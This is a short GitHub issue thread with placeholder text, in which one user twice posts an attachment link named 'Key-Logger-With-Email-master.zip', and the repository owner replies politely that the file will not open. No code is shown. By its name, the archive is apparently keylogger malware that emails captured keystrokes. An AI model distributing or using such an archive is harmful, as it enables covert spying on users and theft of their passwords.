### ISSUE TITLE
qwe

### ISSUE THREAD

**Issue by Justclf** [StepSisStuck/Discord#6]
ewq
[Key-Logger-With-Email-master.zip](https://github.com/StepSisStuck/Discord/files/12612338/Key-Logger-With-Email-master.zip)

**Comment by StepSisStuck** [comment]
Hi Justclf,

I'm writing to follow up on the attachment you sent me. I'm having some
trouble opening it, and I was wondering if you could attach a new version.

Thanks in advance for your help.

Best regards,
Stanly

**Comment by Justclf** [comment]
[Key-Logger-With-Email-master.zip](https://github.com/StepSisStuck/Discord/files/12612374/Key-Logger-With-Email-master.zip)
